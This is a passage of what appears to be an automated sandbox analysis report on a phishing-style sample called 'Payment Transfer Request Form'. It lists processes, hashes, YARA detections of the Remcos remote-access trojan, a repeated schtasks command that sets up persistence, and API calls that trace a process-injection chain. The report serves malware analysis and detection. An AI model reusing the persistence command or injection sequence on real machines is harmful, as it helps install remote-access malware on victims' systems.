                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:19
                                            Start time:02:23:45
                                            Start date:24/11/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff70f010000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:20
                                            Start time:02:23:45
                                            Start date:24/11/2024
                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iKgKaogJ" /XML "C:\Users\user\AppData\Local\Temp\tmpAC9A.tmp"
                                            Imagebase:0x7e0000
                                            File size:187'904 bytes
                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:21
                                            Start time:02:23:46
                                            Start date:24/11/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff70f010000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:23
                                            Start time:02:23:46
                                            Start date:24/11/2024
                                            Path:C:\ProgramData\AppUpdate\remcos.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\ProgramData\AppUpdate\remcos.exe"
                                            Imagebase:0xe60000
                                            File size:1'243'656 bytes
                                            MD5 hash:FC5A80ADF45D78FFA834283D0A78F9F6
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000017.00000002.3782308386.00000000014FA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            Has exited:false

                                            Target ID:24
                                            Start time:02:23:48
                                            Start date:24/11/2024
                                            Path:C:\ProgramData\AppUpdate\remcos.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\ProgramData\AppUpdate\remcos.exe"
                                            Imagebase:0xc20000
                                            File size:1'243'656 bytes
                                            MD5 hash:FC5A80ADF45D78FFA834283D0A78F9F6
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:26
                                            Start time:02:23:54
                                            Start date:24/11/2024
                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iKgKaogJ" /XML "C:\Users\user\AppData\Local\Temp\tmpCD42.tmp"
                                            Imagebase:0x7e0000
                                            File size:187'904 bytes
                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:27
                                            Start time:02:23:54
                                            Start date:24/11/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff70f010000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:28
                                            Start time:02:23:54
                                            Start date:24/11/2024
                                            Path:C:\ProgramData\AppUpdate\remcos.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\ProgramData\AppUpdate\remcos.exe"
                                            Imagebase:0xb10000
                                            File size:1'243'656 bytes
                                            MD5 hash:FC5A80ADF45D78FFA834283D0A78F9F6
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001C.00000002.1574639451.000000000117A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            Has exited:true

                                            Target ID:29
                                            Start time:02:23:56
                                            Start date:24/11/2024
                                            Path:C:\ProgramData\AppUpdate\remcos.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\ProgramData\AppUpdate\remcos.exe"
                                            Imagebase:0xb20000
                                            File size:1'243'656 bytes
                                            MD5 hash:FC5A80ADF45D78FFA834283D0A78F9F6
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:30
                                            Start time:02:24:02
                                            Start date:24/11/2024
                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iKgKaogJ" /XML "C:\Users\user\AppData\Local\Temp\tmpED6C.tmp"
                                            Imagebase:0x7e0000
                                            File size:187'904 bytes
                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:31
                                            Start time:02:24:02
                                            Start date:24/11/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff70f010000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:32
                                            Start time:02:24:02
                                            Start date:24/11/2024
                                            Path:C:\ProgramData\AppUpdate\remcos.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\ProgramData\AppUpdate\remcos.exe"
                                            Imagebase:0x510000
                                            File size:1'243'656 bytes
                                            MD5 hash:FC5A80ADF45D78FFA834283D0A78F9F6
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000020.00000002.1656887776.0000000000D4A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            Has exited:true

                                            Target ID:33
                                            Start time:02:24:04
                                            Start date:24/11/2024
                                            Path:C:\ProgramData\AppUpdate\remcos.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\ProgramData\AppUpdate\remcos.exe"
                                            Imagebase:0xa80000
                                            File size:1'243'656 bytes
                                            MD5 hash:FC5A80ADF45D78FFA834283D0A78F9F6
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:34
                                            Start time:02:24:10
                                            Start date:24/11/2024
                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iKgKaogJ" /XML "C:\Users\user\AppData\Local\Temp\tmpCDB.tmp"
                                            Imagebase:0x7e0000
                                            File size:187'904 bytes
                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:35
                                            Start time:02:24:10
                                            Start date:24/11/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff70f010000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:36
                                            Start time:02:24:10
                                            Start date:24/11/2024
                                            Path:C:\ProgramData\AppUpdate\remcos.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\ProgramData\AppUpdate\remcos.exe"
                                            Imagebase:0x650000
                                            File size:1'243'656 bytes
                                            MD5 hash:FC5A80ADF45D78FFA834283D0A78F9F6
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000024.00000002.1736773927.0000000000BEA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            Has exited:true


                                              Execution Graph

                                              Execution Coverage:11%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:121
                                              Total number of Limit Nodes:2
                                              execution_graph: node/edge listing behind the interactive graph (not reproduced as text); API nodes present in the graph: DuplicateHandle, CreateActCtxA, GetModuleHandleW, PostMessageW, ResumeThread, VirtualAllocEx, ReadProcessMemory, WriteProcessMemory, CreateProcessA, Wow64SetThreadContext.
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1429141530.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6a90000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 05d45f4c6cfbc1fe22838d26d07a65d81395818babd47ddec56ea11aa682a1cf
                                              • Instruction ID: b7030ef46424ec25e38df1ec249ac14dc771bbaf36f59ccdea3b7b79b92ac14d
                                              • Opcode Fuzzy Hash: 05d45f4c6cfbc1fe22838d26d07a65d81395818babd47ddec56ea11aa682a1cf
                                              • Instruction Fuzzy Hash: 2B328C31B016048FDB59EBA5C590BAEBBF7AF89710F248469E146DB390CB35ED01CB61
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1429141530.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6a90000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4cf39f35dabfc75af0301a18481e14170dc8ed526dc75d267ebd61ff88e81c75
                                              • Instruction ID: 284d32f6ca6f2a1dae14b2c2005902684426267776f88c5a488599cfb9c29988
                                              • Opcode Fuzzy Hash: 4cf39f35dabfc75af0301a18481e14170dc8ed526dc75d267ebd61ff88e81c75
                                              • Instruction Fuzzy Hash: AFA00220DDF0128EAFC83C6819000F6D0FC430F408D317801517B770021504C11400BC

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 0 6a97ac0-6a97b55 2 6a97b8e-6a97bae 0->2 3 6a97b57-6a97b61 0->3 10 6a97bb0-6a97bba 2->10 11 6a97be7-6a97c16 2->11 3->2 4 6a97b63-6a97b65 3->4 5 6a97b88-6a97b8b 4->5 6 6a97b67-6a97b71 4->6 5->2 8 6a97b73 6->8 9 6a97b75-6a97b84 6->9 8->9 9->9 12 6a97b86 9->12 10->11 13 6a97bbc-6a97bbe 10->13 17 6a97c18-6a97c22 11->17 18 6a97c4f-6a97d09 CreateProcessA 11->18 12->5 15 6a97be1-6a97be4 13->15 16 6a97bc0-6a97bca 13->16 15->11 19 6a97bcc 16->19 20 6a97bce-6a97bdd 16->20 17->18 21 6a97c24-6a97c26 17->21 31 6a97d0b-6a97d11 18->31 32 6a97d12-6a97d98 18->32 19->20 20->20 22 6a97bdf 20->22 23 6a97c49-6a97c4c 21->23 24 6a97c28-6a97c32 21->24 22->15 23->18 26 6a97c34 24->26 27 6a97c36-6a97c45 24->27 26->27 27->27 28 6a97c47 27->28 28->23 31->32 42 6a97da8-6a97dac 32->42 43 6a97d9a-6a97d9e 32->43 45 6a97dbc-6a97dc0 42->45 46 6a97dae-6a97db2 42->46 43->42 44 6a97da0 43->44 44->42 48 6a97dd0-6a97dd4 45->48 49 6a97dc2-6a97dc6 45->49 46->45 47 6a97db4 46->47 47->45 51 6a97de6-6a97ded 48->51 52 6a97dd6-6a97ddc 48->52 49->48 50 6a97dc8 49->50 50->48 53 6a97def-6a97dfe 51->53 54 6a97e04 51->54 52->51 53->54 56 6a97e05 54->56 56->56
                                              APIs
                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06A97CF6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1429141530.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6a90000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: 44769dd0510229330d7ba417011a914077f9f1b10f8859e2300621b34c9d904a
                                              • Instruction ID: 7d972086231bcc8ef3c52cefaa317eb9b626c9b3aaf2512fd6c8104d376a7d11
                                              • Opcode Fuzzy Hash: 44769dd0510229330d7ba417011a914077f9f1b10f8859e2300621b34c9d904a
                                              • Instruction Fuzzy Hash: DC913871D102198FEF64DF69C8407EEBBF2AF44314F248569D809A7240DB759985CFA1

                                              Control-flow Graph

                                              control_flow_graph 57 6a97ab9-6a97b55 59 6a97b8e-6a97bae 57->59 60 6a97b57-6a97b61 57->60 67 6a97bb0-6a97bba 59->67 68 6a97be7-6a97c16 59->68 60->59 61 6a97b63-6a97b65 60->61 62 6a97b88-6a97b8b 61->62 63 6a97b67-6a97b71 61->63 62->59 65 6a97b73 63->65 66 6a97b75-6a97b84 63->66 65->66 66->66 69 6a97b86 66->69 67->68 70 6a97bbc-6a97bbe 67->70 74 6a97c18-6a97c22 68->74 75 6a97c4f-6a97d09 CreateProcessA 68->75 69->62 72 6a97be1-6a97be4 70->72 73 6a97bc0-6a97bca 70->73 72->68 76 6a97bcc 73->76 77 6a97bce-6a97bdd 73->77 74->75 78 6a97c24-6a97c26 74->78 88 6a97d0b-6a97d11 75->88 89 6a97d12-6a97d98 75->89 76->77 77->77 79 6a97bdf 77->79 80 6a97c49-6a97c4c 78->80 81 6a97c28-6a97c32 78->81 79->72 80->75 83 6a97c34 81->83 84 6a97c36-6a97c45 81->84 83->84 84->84 85 6a97c47 84->85 85->80 88->89 99 6a97da8-6a97dac 89->99 100 6a97d9a-6a97d9e 89->100 102 6a97dbc-6a97dc0 99->102 103 6a97dae-6a97db2 99->103 100->99 101 6a97da0 100->101 101->99 105 6a97dd0-6a97dd4 102->105 106 6a97dc2-6a97dc6 102->106 103->102 104 6a97db4 103->104 104->102 108 6a97de6-6a97ded 105->108 109 6a97dd6-6a97ddc 105->109 106->105 107 6a97dc8 106->107 107->105 110 6a97def-6a97dfe 108->110 111 6a97e04 108->111 109->108 110->111 113 6a97e05 111->113 113->113
                                              APIs
                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06A97CF6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1429141530.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6a90000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: e398c4eb94ee2e9a37367a055c9204817e49799793742842c7f4babff9542320
                                              • Instruction ID: 1e7e37d51b0b3615c7767781c942c50c60fd05d97eb3bad0baa6eca279e90426
                                              • Opcode Fuzzy Hash: e398c4eb94ee2e9a37367a055c9204817e49799793742842c7f4babff9542320
                                              • Instruction Fuzzy Hash: 9F912871D102198FEF64DF68C8817EEBBF2BF44314F2485A9D809AB240DB759985CFA1

                                              Control-flow Graph

                                              control_flow_graph 114 26044b4-26059b9 CreateActCtxA 117 26059c2-2605a1c 114->117 118 26059bb-26059c1 114->118 125 2605a2b-2605a2f 117->125 126 2605a1e-2605a21 117->126 118->117 127 2605a40-2605a70 125->127 128 2605a31-2605a3d 125->128 126->125 132 2605a22-2605a27 127->132 133 2605a72-2605af4 127->133 128->127 132->125
                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 026059A9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1414443854.0000000002600000.00000040.00000800.00020000.00000000.sdmp, Offset: 02600000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2600000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: f1ea635971da1e8961882565cedef21ea56a667e8bc77c8091bbbe920a2d5fe1
                                              • Instruction ID: 89646a71d2c221e3ad5fbaf191395f5ea8b456f5eadbcfc1a9f7cf077dd9f432
                                              • Opcode Fuzzy Hash: f1ea635971da1e8961882565cedef21ea56a667e8bc77c8091bbbe920a2d5fe1
                                              • Instruction Fuzzy Hash: 6F41D470D00719CFEB24CFAAC9847CEBBB5BF89304F60806AD419AB255DB756945CF90

                                              Control-flow Graph

                                              control_flow_graph 136 26058f3-26059b9 CreateActCtxA 138 26059c2-2605a1c 136->138 139 26059bb-26059c1 136->139 146 2605a2b-2605a2f 138->146 147 2605a1e-2605a21 138->147 139->138 148 2605a40-2605a70 146->148 149 2605a31-2605a3d 146->149 147->146 153 2605a22-2605a27 148->153 154 2605a72-2605af4 148->154 149->148 153->146
                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 026059A9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1414443854.0000000002600000.00000040.00000800.00020000.00000000.sdmp, Offset: 02600000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2600000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: e257f9b9407eb41eb2da36ca37751e2877430272eb893ec03edc384180d7a389
                                              • Instruction ID: 896c63a74990e9371da6e040ba56c4df7a46ccfe6b7ad4219837ac847f572960
                                              • Opcode Fuzzy Hash: e257f9b9407eb41eb2da36ca37751e2877430272eb893ec03edc384180d7a389
                                              • Instruction Fuzzy Hash: F041C2B0D00719CFEB24CFA9C9847CEBBB2BF89304F60806AD419AB255DB756949CF50

                                              Control-flow Graph

                                              control_flow_graph 167 6a97838-6a97886 169 6a97888-6a97894 167->169 170 6a97896-6a978d5 WriteProcessMemory 167->170 169->170 172 6a978de-6a9790e 170->172 173 6a978d7-6a978dd 170->173 173->172
                                              APIs
                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06A978C8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1429141530.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6a90000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID:
                                              • API String ID: 3559483778-0
                                              • Opcode ID: f3e2fbcc3e45ff68f93266b89fa7c14682059710fdbb313ed916cd958bc08031
                                              • Instruction ID: f887d1f9bf31243fb55867d3dfb81ec292395c7271c4cfd91bfb8a8a5853c851
                                              • Opcode Fuzzy Hash: f3e2fbcc3e45ff68f93266b89fa7c14682059710fdbb313ed916cd958bc08031
                                              • Instruction Fuzzy Hash: 512126729103499FDF10DFA9C885BEEBBF5FF48310F14842AE958A7240D7799944CBA0

                                              Control-flow Graph

                                              control_flow_graph 157 6a97830-6a97886 159 6a97888-6a97894 157->159 160 6a97896-6a978d5 WriteProcessMemory 157->160 159->160 162 6a978de-6a9790e 160->162 163 6a978d7-6a978dd 160->163 163->162
                                              APIs
                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06A978C8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1429141530.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6a90000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID:
                                              • API String ID: 3559483778-0
                                              • Opcode ID: be9ed1f05deb3a8682e0b2ba776a94a6584338c33331281acec222f5c86eac4e
                                              • Instruction ID: 4403f55316aaa015ebb83a875a224e0f10f5d4628e9820c2dad05440fea36bac
                                              • Opcode Fuzzy Hash: be9ed1f05deb3a8682e0b2ba776a94a6584338c33331281acec222f5c86eac4e
                                              • Instruction Fuzzy Hash: FA2135B6900309DFDB00DFA9C985BEEBBF1FF48310F14842AE918A7240D7789944CBA0

                                              Control-flow Graph

                                              control_flow_graph 177 260d1dc-260d684 DuplicateHandle 179 260d686-260d68c 177->179 180 260d68d-260d6aa 177->180 179->180
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0260D5B6,?,?,?,?,?), ref: 0260D677
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1414443854.0000000002600000.00000040.00000800.00020000.00000000.sdmp, Offset: 02600000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2600000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: 82470361e921140f3eeb22c5610f4bb91cf1f70e194aaa5f6f21b1d39fe391db
                                              • Instruction ID: 241db6a51a51d92756d000b807cbb5ee9dbeabd59c3a54fa60e379654b99a205
                                              • Opcode Fuzzy Hash: 82470361e921140f3eeb22c5610f4bb91cf1f70e194aaa5f6f21b1d39fe391db
                                              • Instruction Fuzzy Hash: C82114B5900249EFDB10CF9AD584ADEBBF4EB48314F14811AE918A7350D374A940CFA4

                                              Control-flow Graph

                                              control_flow_graph 193 6a976a0-6a976eb 195 6a976fb-6a9772b Wow64SetThreadContext 193->195 196 6a976ed-6a976f9 193->196 198 6a9772d-6a97733 195->198 199 6a97734-6a97764 195->199 196->195 198->199
                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06A9771E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1429141530.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6a90000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID:
                                              • API String ID: 983334009-0
                                              • Opcode ID: 9407edba4209aebba838261ed1743553d8e119333067df177c915a0db9eecfd0
                                              • Instruction ID: 998ffbd7521dc8546226f521af39ec368ae2e07319e5aa577fd3185ddbda0775
                                              • Opcode Fuzzy Hash: 9407edba4209aebba838261ed1743553d8e119333067df177c915a0db9eecfd0
                                              • Instruction Fuzzy Hash: FD212771D103098FDB10DFAAC4857EEBBF4EF48314F14842AD559A7240DB789945CFA1

                                              Control-flow Graph

                                              control_flow_graph 183 6a97698-6a976eb 185 6a976fb-6a9772b Wow64SetThreadContext 183->185 186 6a976ed-6a976f9 183->186 188 6a9772d-6a97733 185->188 189 6a97734-6a97764 185->189 186->185 188->189
                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06A9771E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1429141530.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6a90000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID:
                                              • API String ID: 983334009-0
                                              • Opcode ID: b88c8f156fa7b2cd23a515a5ee856489c808d6df17125ca87207f141dce0ec71
                                              • Instruction ID: 9d9cfe27c84c59b5e34af4259390439b0905d018b57de63ee76ed566437f700d
                                              • Opcode Fuzzy Hash: b88c8f156fa7b2cd23a515a5ee856489c808d6df17125ca87207f141dce0ec71
                                              • Instruction Fuzzy Hash: 572168B2D00309CFDB10DFAAC5857EEBBF0EF48214F14842AD559A7240DB789948CFA0

                                              Control-flow Graph

                                              control_flow_graph 203 6a97928-6a979b5 ReadProcessMemory 206 6a979be-6a979ee 203->206 207 6a979b7-6a979bd 203->207 207->206
                                              APIs
                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06A979A8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1429141530.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6a90000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID: MemoryProcessRead
                                              • String ID:
                                              • API String ID: 1726664587-0
                                              • Opcode ID: 7da966d8675d7df85f84303ee55ef2f6b0cedc84d9454e466f301b140ec4e4a7
                                              • Instruction ID: 954c0cdf6602c3574d0fe1df3fbf28fbcf433126cf3941218bea231c1e04083b
                                              • Opcode Fuzzy Hash: 7da966d8675d7df85f84303ee55ef2f6b0cedc84d9454e466f301b140ec4e4a7
                                              • Instruction Fuzzy Hash: 062125B18003499FDB10DFAAC885BEEBBF5FF48310F14842AE958A7240D7799944CBA1

                                              Control-flow Graph

                                              control_flow_graph 211 6a97921-6a979b5 ReadProcessMemory 214 6a979be-6a979ee 211->214 215 6a979b7-6a979bd 211->215 215->214
                                              APIs
                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06A979A8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1429141530.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6a90000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID: MemoryProcessRead
                                              • String ID:
                                              • API String ID: 1726664587-0
                                              • Opcode ID: 3b17d1c7eb618eae3150a920a64090f29c8aa8417a852afa780e3bbab297369b
                                              • Instruction ID: 773d3d3d3a0c1357751ec6c0f9f2887088a820d3a29623b2bac3f023e02c0628
                                              • Opcode Fuzzy Hash: 3b17d1c7eb618eae3150a920a64090f29c8aa8417a852afa780e3bbab297369b
                                              • Instruction Fuzzy Hash: 3D2116B2800349DFDB10DFA9C9857EEBBF5FF48310F14842AE558A7240D7799944CBA0

                                              Control-flow Graph

                                              control_flow_graph 219 260d5eb-260d684 DuplicateHandle 220 260d686-260d68c 219->220 221 260d68d-260d6aa 219->221 220->221
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0260D5B6,?,?,?,?,?), ref: 0260D677
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1414443854.0000000002600000.00000040.00000800.00020000.00000000.sdmp, Offset: 02600000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2600000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: d6e7e6203d6c2cc7ac11e7cb9719893d9aa078b6ba0c62420b62baf28f995be2
                                              • Instruction ID: ef17d70b83d8182f627a2bc85fb3b11278b0345925900f46a7d0d22ed2a5e9ce
                                              • Opcode Fuzzy Hash: d6e7e6203d6c2cc7ac11e7cb9719893d9aa078b6ba0c62420b62baf28f995be2
                                              • Instruction Fuzzy Hash: 3921F3B5900349DFDB00CFAAD584ADEBBF5FB08310F24805AE958A3350D378A954CF65

                                              Control-flow Graph

                                              control_flow_graph 232 6a97778-6a977f3 VirtualAllocEx 235 6a977fc-6a97821 232->235 236 6a977f5-6a977fb 232->236 236->235
                                              APIs
                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06A977E6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1429141530.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6a90000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 7400bb704390c1c461e0143ccc477065b544d09576d89d9cca98b1007e0bfc47
                                              • Instruction ID: dd73fcfbc481357f205cfb96c5b15848bc256e84f16646ad9e299258fd6c4e3f
                                              • Opcode Fuzzy Hash: 7400bb704390c1c461e0143ccc477065b544d09576d89d9cca98b1007e0bfc47
                                              • Instruction Fuzzy Hash: 461126768002499FDB10DFAAC844BDEBBF5EF48310F248419E559A7250C7759944CBA0

                                              Control-flow Graph

                                              control_flow_graph 224 6a97770-6a977f3 VirtualAllocEx 227 6a977fc-6a97821 224->227 228 6a977f5-6a977fb 224->228 228->227
                                              APIs
                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06A977E6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1429141530.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6a90000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: fa0c41d88c38d944c9f80a300fac1b2c7f777eb2ab4d9872b8f7e11d16377a81
